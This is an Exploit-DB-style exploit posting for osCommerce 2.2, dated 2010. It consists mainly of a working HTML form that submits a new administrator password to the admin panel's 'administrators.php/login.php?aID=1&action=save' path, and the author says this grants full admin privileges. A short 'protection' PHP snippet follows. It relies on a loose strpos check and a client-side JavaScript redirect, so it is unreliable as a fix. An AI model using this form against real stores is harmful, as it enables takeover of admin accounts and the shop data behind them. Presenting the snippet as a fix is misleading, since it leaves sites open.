osCommerce 2.2 – Cross-Site Request Forgery

  • 作者: daandeveloper33
    日期: 2010-11-09
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/15472/
  • # Exploit Title: osCommerce v2.2 Change Admin Pass
    # Date: [date]
    # Author: daandeveloper33
    # Software Link: http://oscommerce.com/
    # Version: v2.2
    # Tested on: Mac OS X 10.6.4, osCommerce v2.2 RC2A (Dutch)
    This is the code that you can execute to change the admin pass:
    <?/*Author: daandeveloper33
    E-Mail: daandeveloper33@gmail.com
    Software: osCommerce v2.2
    Date: 09 Nov 2010
    Description: Change the admin password of the admin panel of oscommerce.And then you have got all admin privileges
    <form name="administrator" action="http:/server/linktoadminpanel/administrators.php/login.php?aID=1&action=save" method="post"> Change Admin Pass
    Username<br><input type="text" name="username" value="admin">
    <br>Password<br><input type="password" name="password" maxlength="40"></td> 
    <br><input type="submit" alt="Update" title=" Update " value="Change It!"> <a href="http://server/linktoadminpanel/administrators.php/login.php?aID=1"></a>
    This is the code to protect against this attack:
    First Write protection.php:
    <?$self = $_SERVER['PHP_SELF'];
    $pos = strpos($self, 'login.php');if($pos == true){echo "<script language='javascript'>window.location = 'http://server/index.php';</script>";}?>----------------------------Save protection.php in the admin map of oscommercethen paste following code in all pages in the /admin map(expect login.php): include('protection.php')